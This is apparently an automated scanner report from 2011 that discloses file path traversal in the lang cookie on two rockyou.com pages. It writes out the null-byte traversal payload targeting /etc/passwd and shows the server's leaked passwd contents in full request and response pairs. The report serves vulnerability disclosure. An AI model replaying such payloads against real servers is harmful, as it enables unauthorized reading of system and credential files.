CWE-23, Path Disclosure, Directory Traversal, CVSS 10, rockyou.com

The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

Report generated by XSS.CX at Wed Apr 20 11:26:36 CDT 2011.


1. File path traversal

1.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

1.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]



1. File path traversal
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than by name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



1.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /fxtext/fxtext-create.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /fxtext/fxtext-create.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170687; expires=Wed, 27-Jul-2011 23:51:27 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=7180 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85570

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...

1.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /show_my_gallery.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /show_my_gallery.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 23:51:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Location: show_my_gallery2.php?
Set-Cookie: ctid=1; expires=Mon, 25-Apr-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170664; expires=Wed, 27-Jul-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=9310 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17248

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...